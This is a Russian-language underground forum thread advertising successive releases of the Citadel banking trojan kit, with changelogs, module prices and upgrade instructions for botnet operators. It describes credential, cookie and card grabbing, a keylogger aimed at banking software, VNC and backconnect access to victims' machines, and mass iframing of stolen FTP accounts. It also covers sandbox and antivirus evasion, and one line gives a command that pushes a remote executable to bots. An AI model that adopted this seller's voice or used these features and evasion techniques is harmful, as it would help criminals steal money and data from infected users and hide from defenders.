[+] У нас долгожданная революция: ПОЛНОСТЬЮ переделано шифрование (передача данных, запись логов/видео, загрузка конфигов и т.д) у Citadel, на смену устаревшему RC4 используемому в Zeus, пришел AES 128. Напомню, что RC4 дал асечку, когда массово начали выпускаться различные декрипторы конфигов/инжектов для Zeus, а хосты начали палиться в abuse.ch.
Теперь помимо встроенного RC4, который шифруется с вашей персональной сигнатурой, в софт также встроено AES шифрование, на выходе мы получаем защищеное AES128 обращение бот<->гейт. Никакие ZeusDecryptor'ы(ThreatExpert) и автоматизированый реверсинг не будут помехой для вашей комфортной работы на текущий момент.
Для клиентов, обновление полностью бесплатно, обращаться к сапорту (админку необходимо будет переустановить, старым ботам перезаписать ехе-файл)
Последняя версия билдера: 1.2.0.0

Добавлено через 30 секунд

Cписок выполненых задач на 31 января 2012 года:
1) Внимание! Всем клиентам с подключенным AES/VNC-модулем, необходимо стукнуть в тех.поддержку и срочно забрать новую версию гейта для VNC-админки, был обнаружен критический баг при обработке логов, который мог обрезать часть логов от ботов. Обновление выпущено.
2) Заработала промо-акция! Приведи партнера и получи любой веб-модуль на выбор в подарок. Количество приглашаемых партнеров и модулей неограничено

3) Список фиксов:
[+] Исправлена ошибка записи репортов у веб-фильтров в конфиге с параметром "!" (игнорирование), который должен был исключать все заданные ссылки, а вместо этого делал обратное и писал их в лог.
[+] Добавлен новый параметр-фильтр в config-файл, а именно функция отсылать или не отсылать cookie на сервер.
Параметр статичного конфига disable_cookie 0/1 указывает отключить ли граббинг куков (1 - отключить, 0 - включить).
Вручную, также, кукисы можно получить командой user_cookie_get из админки, если очень нужны.
[+] Добавлена функция произвольного открытия страницы дефлотовым браузером пользователя на боте.
К примеру, если вам нужно накрутить какой-нибудь счетчик или статистику голосования или вы хотите получать доп.доход с вашего ботнета открывая страницы с шопами (а также: фарма, гемблинг, дроп-проекты и т.д..) отличный способ разрекламировать нужную страницу!
Новый параметр url_open <url>
[+] Новый вид фильтрации WebFilters в конфиг-файле при сборке.
Два новых параметра: P и G.
Параметр P указанным перед ссылкой, указывает о записи только POST запросов(все другие игнорируются) с этой ссылки.
Параметр G указывает о записи только GET запросов (все другие игнорируются) с заданной ссылки.
Параметры не комбинируются, т.е. следует указывать какой-то один из них.

Добавлено через 32 секунды

Список изменений на 1 февраля 2012 года:

[+] Добавлено 104 новых UPDATE AV-сервера в DNS-фильтры.
[+] Создана Knowledge-база в CRM (теперь все вопросы-ответы по самым разным ситуациям можно будет просмотреть и понять в чем была проблема где-то). Наполняем базу все вместе!
[+] Переделано AES шифрование в серверной части, которое добавляло раньше большую нагрузку (т.к. зона риска это клиент и конфиг, то там шифрование остается). Скорость работы AES2 версии превосходит АES на 200%
[+] Улучшена команда user_execute, теперь она способна работать с файлами защищенными гейтом.
[+] Исправлен баг с апдейтом бота, команда bot_update теперь срабатывает корректно.

Последняя версия билдера 1.2.4.0

Внимание! Через 3-4 дня планируется обновление билдера в виде реализации системы прикладных модулей, таким образом, например, будет отдельно вынесен видео-граббер на сервер, и вес билда будет <180 KB. Цена на базовую комплектацию будет повышена, поэтому, торопитесь, если вы еще хотите приобрести лицензию по старой цене.

Добавлено через 30 секунд

Новая версия билдера 1.3.0.0 Millennium Edition:

[+] Добавлена модульная система в софт, что дает нам:
* Расширяемость и загрузку любого операционного функционала ботам, ориентированного для Citadel.
Все модули загружаются с сервера и распаковываются динамически в памяти, что исключает их детектирование.
Хранение и передача во внешнем мире исключительно в шифрованном виде.
Модули грузятся в целевые процесссы, поэтому весомо экономят память.
Большая управляемость - модули можно отключать через конфиг.
[+] Видео-граббер переделан на модульную основу. Теперь вес некриптованного билда <190 кб. Всегда.
[+] Добавлен новый параметр timer_modules (тайминги для загрузки модулей).
[+] Добавлена поддержка нового браузера Google Chrome 17, а также исправлен баг с обработкой Flash'a в нем.
[+] Добавлена поддержка макросов. Введены макросы: %BOTID%, %BOTNET%
* Можете вставлять в любой участок инжектов данные макросы и передавать данные на ваш сервер (АЗ/инжекты), передается имя бота и имя ботнета.
[+] Добавлены 4 команды управления модулями (включение/выключение, запрет/разрешение на скачивание).
[+] Добавлен новый параметр disable_httpgrabber 1/0 для Chrome: исключает обработку обычных HTTP (не HTTPS) запросов.
[+] Данный релиз специально адаптирован под старые версии Citadel, для обновления перезаливаем ехе + конфиг и модули и даем команду bot_update.

Переход на данную версию текущим клиентам составляет $350 (единоразовая плата). Для тех, кто еще подумывает над покупкой, рекомендуется думать быстрее  Функционал растет и развивается в соответствии с вашими пожеланиями в СРМ.
Цена на базовую комплектацию изменена и составляет сейчас $2899.00

Добавлено через 36 секунд

Опубликована версия 1.3.1.0, всем клиентам срочно обновиться!
[+] Добавлена запись полного User-Agent в отчеты HTTP(S) граббера, позволяет клонировать холдерский UserAgent через любые утилиты типа CCTools.
[+] Добавлена запись разрешения экрана в отчеты HTTP(S) граббера, пример "Screen(w:h): 1600:900" - полезно при клонировании параметров холдера, многие банки на это обращают внимание.
[+] Изменен протокол отправки видео-файлов для снижения нагрузки на сервер (у некоторых были проблемы с нагрузкой на сервер и он сильно тормозил)
[+] Добавлена возможность отсылки jabber-уведомлений нескольким получателям в админке Citadel.
[+] Добавлена возможность указания нескольких url_config'ов (пути до основного конфига), раньше было так: если у вас недоступен основной конфиг в момент инсталла бота, то резервный никак не скачивался, теперь этой проблемы не будет и бот пытается стянуть конфиг с другого URL'a(можно вписать до 20 резервных).
[+] Исправлена критическая уязвимость в двух файлах(гейт и протектор конфига), уязвимость позволяла при неправильной настройке сервера закачать в папку с отчетами произвольный файл(например шелл) и читать системные файлы. Ссылки на пофиксенные скрипты находятся в СРМ.

Стучимся к саппорту за апдейтом до 1.3.1.0 версии.

Добавлено через 54 секунды

Последнее февральское обновление Citadel.
Версия 1.3.2.0

Что сделано:
[+] Добавлен модуль MiniAV, который позволяет чистить ПК бота от чужой малвари, модуль срабатывает каждые 4 часа и удаляет все Zeus-модификации из системы, такие как Zeus1,2,Ice9 и т.п. Живучесть вашего билда поползет вверх в несколько раз, рекомендовано тем, кто встречал у себя в логах чужие гейты и использует трафик с бирж. В ближайшее время будут добавлены сигнатуры для удаления фейкав и подмены выдачи.
Цена модуля: $200 (комплектуется совместно с персональным билдером)
[+] Исправлена ошибка в Google Chrome (17x) приводящая к зависанию подпроцесса, при открытии нескольких вкладок с инжектами.
[+] Добавлены новые команды:
- Получение информации об установленном ПО (список - компания|продукт|версия) на компьютере: info_get_firewall
- Получение информации об установленном антивирусе на компьютере: info_get_antivirus
- Получение информации об установленном фаерволе на компьютере: info_get_firewall
Информация идет в виде отдельного репорта для каждого бота. Скоро встроим массовую статистику по установленному софту в админку Citadel.
[+] Изменен алгоритм антиэмуляции для ряда АВ (не считается криптором, софт стал невидимым для нескольких проактивок).
[+] Исправлена проблема запуска под пользователем SYSTEM.
[+] Добавлена возможность особых Jabber-уведомлений, при обнаружении заданных ботов по маске (к примеру маска *corporate*, будет искать botid с таким совпадением), даже если они не прислали никаких логов, скрипт уведомит вас в Jabber-сообщении о появлении бота. Теперь вы не пропустите мимо глаз ценных ботов.

За апдейтом - к саппорту, если хотите приобрести модуль MiniAV - сообщайте заранее.

Добавлено через 32 секунды

Дорогие коллеги, рады представить вам долгожданный мартовский релиз Citadel v1.3.3.0 Spring Edition!
Весна пришла, а значит пришло время перемен и расцвета функционала. Готовьте новые сани к лету
Наш продукт стал уникальным в своем роде и поэтому, ниже мы приведем вам список того, что мы можем вам дать уже сейчас, для прибыльной работы с новой версией:

1) В админке появилась новая секция "Эффективность и Безопасность", мы провели интеграцию с сервисом scan4you, и теперь вы можете одним кликом проверить все ваши ехе-билды на палевность сразу в админке Citadel, также, вы можете установить автоматическую проверку файлов раз в сутки, и если один из ваших файлов палится более чем 3я антивирусами, вы немедленно получите уведомление в ваш Jabber, чтобы вы могли
сразу заменить ехе. Теперь механизм будет работать за вас автоматически, ленитесь на здоровье!

2) Некоторые клиенты жаловались на то, что лишь 40% ботов обновляется на новую версию ехе, остальные не могут обновиться по какой-то неизвестной причине. Действительно, баг остался еще со времен зевса, мы его исследовали и исправили. Теперь введен новый параметр в конфиге: timer_autoupdate 8
В котором задается время (в часах), как часто скачивать и перезапускать exe с сервера (RC4 ключ должен совпадать). 80% ботов теперь обновляются успешно, криптуйте и перезаливайте ехе, живучесть повысилась на 37.1%, ваши боты будут иметь самый свежий и чистый билд.

3) Переработанна система отправки отчетов на сервер, в предыдущих версиях для каждого отчета происходила единичная отправка POST запроса на гейт, в новой схеме отчеты отправляются пачкой по несколько штук, это позволяет свести до минимума количество сессий на сервере и нагрузка на сервере становится минимальной, что позволяет выдерживать большое количество ботов онлайн.

4) Формат видео от ботов изменен на .webm(HTML5), мы встроили онлайн видео плеер в админку Citadel, теперь вы можете смотреть видео прямо в вашем брауезере(рекомендуется Opera). Из возможностей: перемотка назад-вперед/фулл-скрин/поиск видео по BotID,IP-адресу,дате.
Но этого мало и мы пошли дальше, многие из вас используют(пора уже всем использовать и разрабатывать индустрию совместно) АЗ и персональные админки для инжектов/сбора акков и т.п. Вы бы хотели из вашей админки смотреть видео по заливу или как работает ваш инжект на боте? Легко! Мы создали API-систему, теперь вы можете передать BotID или IP-адрес скрипту, а API вернет вам готовый HTML-embed код всех видео по данному боту и вы можете вставить и смотреть видео хоть на narod.ru, не заходя в админку Citadel.


5) Добавлен удобный анализатор-парсер системных команд (CMDList) в админку, теперь вы можете посмотреть в новом формате в виде таблицы, результаты выполнения системных команд, таких как: ipconfig, список ПК в локальной сети, список процессов и т.п.

6) Теперь при установке билда на бота, автоматически единоразово присылается в админку cледущая информация: установленные фаерволлы, установленные антивирусы, установленные программы.
Вы можете посмотреть информацию как для отдельного бота, так и для всего ботнета. Мы создали отдельный раздел, в котором вы можете посмотреть всю статистику в виде наглядного графика и подсчетов. Теперь вы знаете с кем бороться.


7) Добавлена возможность "Избранных логов", вы можете пометить любой интересный аккаунт(отчет) при поиске данных в админке, а потом без труда найти его т.к он будет выделен отдельным цветом.

8) Разработан новый модуль "CardSwipe", который позволяет грабить из HTTPS/WinSocket карты и дампы и присылает их как отдельный отчет, которые вы можете отдельно найти.
Поиск осуществляется методом анализа трафика по алгоритму LUHN10. Погрешность - 25%
Цена модуля: $250 LR

9) Реализована совместимость инжектов с UTF-8 (теперь в инжекты можно вставлять любые языки, такие как японский, китайский и т.д)

10) Хотите найти новых клиентов или партнеров по вашей теме? Тогда попробуйте разместить у нас, в Citadel CRM баннерную рекламу.
Количество мест: всего 3 (234x60), два еще пока свободны, принимаем мы не всех, а только смежные сервисы и поиск услуг (загрузки, крипт, траф и т.п, поиск партнеров). Стоимость размещения уточняйте в Jabber'e у support'a

Как обычно, текущим клиентам обновление бесплатно. Оставляем заявку в Jabber'e или CRM. (Выдача комплектов 15 марта в 23.30)
Новым клиентам - скидки на приобретение полного пакета!

Добавлено через 32 секунды

И снова очередное пополнение в семействе Citadel! Встречайте новую версию: Citadel v1.3.3.5
В этом релизе мы больше акцентировали внимание на доработку и багфиксы, потому что версия 1.3.3.3 возможно была у кого-то не сильно стабильной (это касается коэфицентов отстука, живучести, логов).
Спасибо нашим клиентам за обратную связь, которую вы давали нам с момента выхода последней версии, мы внесли нужные корректировки и вот список нововведений:

1) Разработана крипт-панель в админке Citadel. Это раздел в админке, который позволяет вам обновлять ехе-файл ботам, прямо из веба. В любой момент, вы можете перезакачать нужный ехе-файл и боты его своевременно скачают. Ведется история загрузок в формате: Файл | Дата Загрузки | Оплачено(Y/N)
По поводу последнего пункта, мы разделили полномочия и создали отдельную категорию пользователей с правами "криптера" - эти пользователи имеют доступ к вашей панели по вашему желанию и единственная привилегия этих пользователей - возможность обновлять ехе-файл, при этом вы можете отмечать в таблице, оплачен конкретный крипт или нет.
Можно включить jabber-уведомления по результату проверки на scan4you.
Как это работает? Нанимаете криптера, он заходит в вашу админку и перезакачивает вам ехе, ведется история и вы следите за историей криптов и помечаете что оплачено, что нет.
Пожелание криптерам: возьмите на заметку, предоставлять данную услугу за доп.плату ;)

2) Добавленны полноэкранные скриншоты (Опция в конфиге - "@@").
3) Улучшен механизм автоапдейтинга: если вы столкнулись с проблемой большой нагрузки на сервере при обновлении(либо боты не переходят на новую админку), то этот фикс исправляет эту ситуацию. Фикс включает в себя:
- Старые репорты от прошлой версии ехе удаляются при обновлении (tmp файл), дополнительная подстраховка.
- Тяжелые отчеты (видео и прочее файловые репорты) дополнительно проверяются на корректность и удаляются в случае проблем(например, если такой файл уже закачан)
- Изменено время инициализации апдейтинга, в результате чего исклчючен deadloc и не возможность дальнейшего апдейта при какой-либо ошибке файловой системы.
4) Исправили проблему мусорных логов в админке: убрали полное логирование Flash-роликов (swf/flv) из логов и всего Facebook, потому что огромное количество мусора идет именно от них.

4) Модуль "Качественная проверка WebSocks" теперь встроен в админку, никаких лишних скриптов. Показывает: страну, штат, город, хостнейм, аптайм и ping lag.
Возможность входа в этот раздел без пароля, для удобства когда нужен срочно сокс

5) Модуль "Парсер логов" теперь встроен в админку, никаких лишних скриптов. Интерфейс значительно улучшен, добавлена возможность создания "избранных доменов", "архивных логов" и возможность парсинга https или http доменов на выбор. Выстраивается визуальная таблица всех доменов, которые фигурируют в логах.

6) Добавлен раздел "Заметки" в админку Citadel, что-то вроде онлайн блокнота. Адаптировали интерфейс админки для планшетов iPad/Galaxy Tab.

7) Доработали модуль "VNC-админка", теперь он встроен напрямую в админку Citadel, никаких дополнительных скриптов. Все устанавливается 1 кликом. Много новых возможностей, а именно:
- Возможность работы с API, вы передаете BotID или IP-адрес скрипту, к примеру через инжект, а он устанавливает VNC/BackConnect Socks-соединение, присылая данные для подключения вам в Jabber. Можно вызывать скрипт в любой момент времени, применимо к АЗ.
- Напротив каждого отчета в разделе "Поиск в базе данных" появилось 4 кнопки: "Добавить в избранное", "Connect VNC", "Connect BC Socks", "Autoconnect VNC", "Autoconnect BC SOCKS"
- AutoConnect VNC при включенной опции, бот будет устанавливать vnc-соединение при каждом выходе в онлайн, пока вы не отключите это.
- AutoConnect BC Socks при включенной опции, бот будет устанавливать backconnect socks соединение при каждом выходе в онлайн, остальные опции создают разовый коннект.
- Появилась возможность создавать автоматически VNC/BC SOCKS-соединение как только от бота пришел нужный аккаунт по URL-маске, разбираем горячие пирожки.
- Напротив каждого аккаунта по URL-маске пишется дата последнего входа в этот акк (last login), теперь вам не надо чекать аккаунты на активность - за вас это сделают скрипты.
- Возможность любых уведомлений в несколько Jabber'ов сразу.

8) Исправлена проблема цепочки хуков в Chrome.
9) При запуске user_execute с флагом "-f" принудительно переводится в режим только апдейтинга ехе и не будет запущен как инсталятор.
10) Оптимизирована работа гейта, что позволило снизить нагрузку. Упрощена работа инсталлятора админки, что позволяет установить все модули в 1 клик.

Версия протестирована в работе, поэтому считаем релиз как "Stable" версию.
Текущим клиентам: все обновления бесплатны(если оплачена поддержка), новым клиентам: сезон скидок временно закончен.
Размещаем заявки Support'у, все комплекты выдаются в понедельник(2 Апр) в 22.00.

Добавлено через 1 минуту

*HOT NEWS*

Свежая ветка Citadel 1.3.4.0 готова + доступны НОВЫЕ МОДУЛИ к покупке!

Список изменений:
- Добавлена поддержка новой версии Chrome 18 [инжекты/формграббинг]
- Добавлена кнопка "Все отчеты бота" в админке, позволяет просмотреть начало и конец отчетов от конкретного бота.
- Исправлен баг с ручной командой dns_filter_add, теперь блокировка URL'ов работает корректно.
- Исправлен баг с отображением ехе-файлов на главной странице, удаленные ехе теперь исчезают автоматически.
- Исправлен баг с работой планировщика заданий scan4you, ежедневная проверка ехе-файлов работает корректно.
- Добавлена единая система CRON-работы, одно cron-задание управляет теперь всеми задачами: jabber-уведомления, проверка файлов, работа модулей и т.п.
- Добавлена возможность удаления видео из админки.
- Добавлена отсылка примечания к боту в Jabber в VNC-модуле.
- Обновлена GeoIP база (конец 2011 года).
- Последний домен из AdvancedConfigs срабатывает с задержкой, сделано с целью защиты ваших резервных URL'ов от автоматического граббинга ханипотами.
- Исправлена работа скрипта архивирования данных в zip в админке (fsarc.php)
- Настройки Jabber-аккаунта и всех параметров теперь вынесены в общие настройки.
- Теперь можно указывать пути в конфиге с httpS:// (неподписанные сертификаты проходят)
- Исправлен баг с регистрозависимостью в инжектах, теперь <BODY> и <body> одинаковые сущности. Все инжекты регистронезависимые.

Список новых модулей:

1) Автоматический ифреймер FTP-акков с логов:
- Автоматическая обработка всех пришедних FTP-акков в логи, а также возможность ручного запуска в нужное время.
- Всю работу выполняет скрипт-прокладка, заливаете ее на любой хост и работа начинается. Админ-интерфейс и прокладка общаются с собой по HTTP, посредством cron'a.
- Создана фаза самотестирования, проверяет подходит ли прокладка и все ли настройки правильно выставлены.
- CRON-система каждую минуту спрашивает ифреймер как у него дела: сколько заданий выполняется, сколько в очереди, сколько готово. Если есть аккаунты с которыми он уже закончил — они вытаскиваются и сохраняются. На ифреймере эти акки удаляются для экономии памяти.
- Предусмотрен механизм защиты от зависания ифреймера на сложных FTP-акков (с такой проблемой вы наверное сталкивались, когда скрипт останавливался и ничего не происходило, даже после перезапуска)
- Возможность задавания глубины ифрейминга (от 1 до 50 уровня), иначе говоря сколько папок внутри подпапок мы проходим.
- Возможность задавания масок файлов для работы, а также списка игнорирования.
- Несколько режимов: умный(не повреждает PHP/JS/ASP скрипты) , запись в конец, перезапись, только проверка на валидность
- Реализована проверка на дубли.
- Замена старого ифрейм-кода новым. Если изменился HTML-код — он не тупо добавится, а заменит собой старый.
- Опция "ифреймить только вчерашние акки". Даст сутки на то чтобы убрать из списка нужные вам FTP.
- Опция: реифрейминг аккаунтов спустя N дней. Каждый аккаунт спустя N дней будет обработан заново.
- Удобная и подробная статистика.
- Из минусов: низкая скорость работы, за неделю, в среднем обрабатывается не более 3000 FTP-аккаунтов.
Полное описание предоставляется в мануале, после приобретения.
Стоимость модуля: $1000.00

2) Дубль-клинер

Скрипт позволяет очищать логи бота от дублей HTTP/HTTPS/FTP/POP3 отчетов.
Нагрузка на БД минимальная, хорошо работает в паре с модулем "Веб-парсер логов".
Отключается и включается в настройках админки.
Выгода: быстрее работает поиск по базе данных, база занимает меньший размер.
Стоимость модуля: $90

3) Система защиты GeoIP

Комплект скриптов позволяет спрятать ваш конфиг,ехе и гейт от ненужных вам стран, при запросе нежелательные страны и боты будут получать 404 ответ.
Хорошо помогает для защиты от трекеров и реверсеров. Включается и отключается в настройках.
Из минусов: способен выдержать только маленькие (до 2000 ботов онлайн) ботнеты, поскольку PHP не расчитан на такую тяжелую и грязную работу.
Бюджетный вариант от абуз. Рекомендуется использовать только для маленьких узконаправленных VIP-ботнетах, с целью перевода ценных ботов на особый ботнет.
Цена: $380

4) Кейлоггер

По запросам наших клиентов в СРМ, переделали модуль для перехвата нажитых клавиш (унаследован от зевса).
Модуль позволяет перехватывать отдельно-взятые приложения и посылать данные в админку как отдельные отчеты.
К примеру, вам нужно перехватить нажатые клавиши процесса "calc.exe", вы вводите название процесса в конфиг и все данные по нему будут приходить в админку.
Эффективно при работе с банковским софтом(+java), который ставится на PC холдера.
Цена: $300


Размещаем заявку у support'a, выдача 30 апреля(понедельник) в 22.00.
Модули можно купить уже сейчас.

Добавлено через 35 секунд

Новая летняя версия Citadel 1.3.4.5 Summer Edition готова порадовать ваших ботов своим присутствием и обильным функционалом.

Как видите, за последний месяц произошло много изменений, например вышел Chrome 19, старые версии начали попадать в ZeusTracker.
Поэтому пока одни сомневаются, другие зарабатывают и идут в ногу со временем, обналичивая очередной залив и улучшая свой софт
Изменений очень много, от глобальных до минимальных, все их здесь нет смысла писать, поэтому выделим самое основное, что пригодится в боевых условиях именно вам:

[+] Добавлен онлайн просмотр скриншотов из админки. Скрины выстраиваются в ряд в порядке появления, легко переключаются клавишами вперед-назад, сортируются. Нет смысла больше скачивать картинки и смотреть по одной. Виртуальные клавиатуры/страницы видно последовательно.
[+] Добавлена история отстука, вы можете посмотреть статистику отстука вашего ботнета(активных,всего,процент) за неделю, две недели или месяц.
[+] Добавлена история версий софта, вы можете посмотреть статистику по обновлениям Citadel в вашем ботнете. Будете знать сколько ботов перешло на новую версию, а сколько осталось на старой. Рисуется диаграмма.
[+] Возможность поиска логов, только по ботам, которые находятся в онлайне.
[+] Возможность поиска логов по нескольким кейвордам сразу, а также можн их сохранить как алиас и не вводить при следущем поиске заново, а просто выбрать из списка.
[+] Добавлена кнопка "C*****s" в контекстное меню по ботам, которая позволяет оперативно вывести все C*****s бота, если вы их не отключали. Экономит время.
[+] Интегрирована функция экспорта FTP-аккаунтов в API, полезно, если используете сторонний софт класса FTP-Iframer, позволяет вывести в plain-text/xml/php формате ftp-акки по нужной дате.
[+] Добавлена кнопка "Whois" в просмотре отчета, позволяет одним кликом получить всю информацию по IP-адресу отчета.
[+] Добавлена функция комментария к боту при просмотре отчета, а также времени, когда бот последний раз был онлайн. Комментарий подсвечивается при поиске в логах.
[+] Создан новый раздел "Избранные отчеты", который позволяет сохранить быструю ссылку на нужный вам отчет + комментарий к ниму. К примеру, если вы встретили интересный аккаунт, нажимаете "добавить в избранное" и отчет будет виден в отдельном разделе, с автоматическим Whois'ом данных и вашим комментарием. Сохраняйте акки не отходя от кассы.
[+] Добавлен антиэмулятор, который позволяет защитить ваш ботнет от реверсинга и попадания в трекеры. Если при запуске, билд детектит что он был запущен в виртуальной машине или песочнице CWSandbox, VMware, Virtualbox, Sandbox он начинает вести себя по-другому и ваш ботнет останется незамеченным. Подробности не раскрываются, т.к анонс находится в паблике и технология очень хитрая.
Из минусов: не сможете протестировать работу в Vmware, придется делать это на реальном ПК или дедике. Опция antiemulation_enable 1/0 вынесена в конфиг.
[+] Добавлено отображение статуса бота "Online/Offline" при просмотре отчета.
[+] Одна из самых главных фич: предпросмотр отчета при поиске логов. Не нужно больше открывать 200 окон в браузере, чтобы просмотреть каждый отчет и каждую ссылку. Теперь можно легко нажав на один отчет сделать предпросмотр, а если отчет будет интересен, то просмотреть полную версию.
Поддерживается быстрое переключение между отчетами клавишами назад-вперед-ESC.
[+] Обновлён скрипт cronjob очистки старых скриптов(команд). Теперь должен у всех работать без багов.
[+] Добавлена в контекстное меню опция "Скриншоты бота"
[+] Модуль VNC-админки: добавлена сортировка по дате последнего соединения / ОС (К примеру, если нужно только WinXP).
[+] Модуль парсер логов: добавлена сортировка по домену / количеству отчётов в порядке убывания.
[+] Модуль FTP-ифреймер: исправлен баг с "умным" ифреймингом, когда кавычки в iframe-коде экранировались. Текущим владельцам, рекомендуется перезалить скрипт-прокладку.
[+] Поскольку предыдущий алгоритм шифрования был взломан спустя несколько месяцев, из-за этого некоторые клиенты попадали в ZeusTracker. Мы разработали и внедрили новый алгоритм шифрования на основе модифицированного RC4. В шифровании используется особый ключ, известный только клиенту. что требует его наличия для расшифровки. Поскольку у каждого клиента свой индвидуальный ключ, теперь от одного клиента не будут страдать все остальные. Если попал один, другие будут от этого защищены. Сейчас мы полностью изолированы от автоматического анализа билдов. В итоге получаем 2 уровня авторизации-защиты бота от трекеров.
[+] Сделали подрезание опции X-Frame-Options в HTTP Header'ах, т.к она может мешать некоторым инжектам в работе (отвечает за фреймы на странице).
[+] Проделана огромная работа для корректного формграббинга/инжектинга в Chrome 19 (19.0.1084.52m).
[+] Ускорена работа на больших ботнетах админ.интерфейса + гейта засчет оптимизации функционала GeoIP-базы.
[+] Сделано возможное удаление .sol файлов при установке билда.
[+] Добавлен граббинг Accept-Language, Accept-Encoding в отчетах.


Новая версия в связи с измененным алгоритмом шифрования несовместима со старыми, поэтому ставим админку в новую директорию(+новую БД) и переносим ботов через команду user_execute http://www.host.com/1345.exe. После переноса ботов, даем на старой админке команду bot_uninstall, чтобы деактивировать старую версию.
Опубликована новая версия мануала, рекомендуется перечитать его снова для усвоения новой информации по софту.
Размещаем заявки у support'a, выдача будет производиться если полностью уплачена арендная плата. Займет от 3 до 48 часов с момента размещения.
Выдача начинается в понедельник а 23.00.
Совсем скоро будет закрытие открытой продажи для всех и ввод системы покупки только через поручителей (текущих клиентов), поэтому те, кто писал по поводу демо-версии, поторопитесь с решением или придется искать поручителей.
Цены остались прежними, скидки только при покупке VIP-пакета.
Обратно в Куплю/Продам/Обменяю

Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных

  1. ProLogic.Su
  2. Other
  3. Куплю/Продам/Обменяю